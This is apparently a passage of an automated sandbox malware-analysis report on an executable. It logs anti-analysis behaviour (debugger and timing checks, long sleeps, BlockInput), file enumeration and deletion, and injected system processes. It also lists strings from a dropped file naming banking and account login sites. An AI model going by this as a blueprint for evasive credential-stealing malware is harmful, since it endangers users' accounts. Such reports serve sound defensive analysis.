Source: 4sfN3Gx1vO.exe, 00000000.00000003.2058384684.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2086984348.0000000001605000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058889356.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2057850030.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2061991495.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058146418.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000002.2087777938.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058721100.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2074661232.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058613766.000000000160C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\prevhost.exe

Window / User API: threadDelayed 9743

Jump to behavior

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	API coverage: 4.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\prevhost.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032	Thread sleep count: 230 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032	Thread sleep time: -460000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032	Thread sleep count: 9743 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032	Thread sleep time: -19486000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\prevhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\prevhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0057DBBE
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0054C2A2 FindFirstFileExW,	0_2_0054C2A2
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005868EE FindFirstFileW,FindClose,	0_2_005868EE
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0058698F
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0057D076
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0057D3A9
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00589642
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0058979D
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00589B2B
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00585C97
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6C7C0 FindFirstFileW,FindNextFileW,FindClose,	5_2_02F6C7C0

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005142DE

Source: al6P40S6.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: al6P40S6.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: al6P40S6.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: al6P40S6.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: al6P40S6.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3315257400.000000000158F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: al6P40S6.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: al6P40S6.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: al6P40S6.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: al6P40S6.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: al6P40S6.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: al6P40S6.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: al6P40S6.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: al6P40S6.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: al6P40S6.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: al6P40S6.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 00000008.00000002.2694761071.00000216086BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllX
Source: al6P40S6.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: al6P40S6.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: al6P40S6.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_024F7C13 LdrLoadDll,

2_2_024F7C13

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0058EAA2 BlockInput,

0_2_0058EAA2

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00542622

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005142DE

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00534CE8 mov eax, dword ptr fs:[00000030h]	0_2_00534CE8
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_016028F0 mov eax, dword ptr fs:[00000030h]	0_2_016028F0
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_01603F60 mov eax, dword ptr fs:[00000030h]	0_2_01603F60
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_01603F00 mov eax, dword ptr fs:[00000030h]	0_2_01603F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]	2_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]	2_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]	2_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]	2_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]	2_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]	2_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]	2_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]	2_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]	2_2_02FD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]	2_2_02F2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]	2_2_02F50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_02F2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]	2_2_02F720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_02F2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]	2_2_02F380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]	2_2_02FB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]	2_2_02FB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]	2_2_02FC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]	2_2_02F3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]	2_2_02F5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]	2_2_02F32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]	2_2_02FB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]	2_2_02FC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]	2_2_02F2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]	2_2_02F2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]	2_2_030061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]	2_2_02FB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]	2_2_02F601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
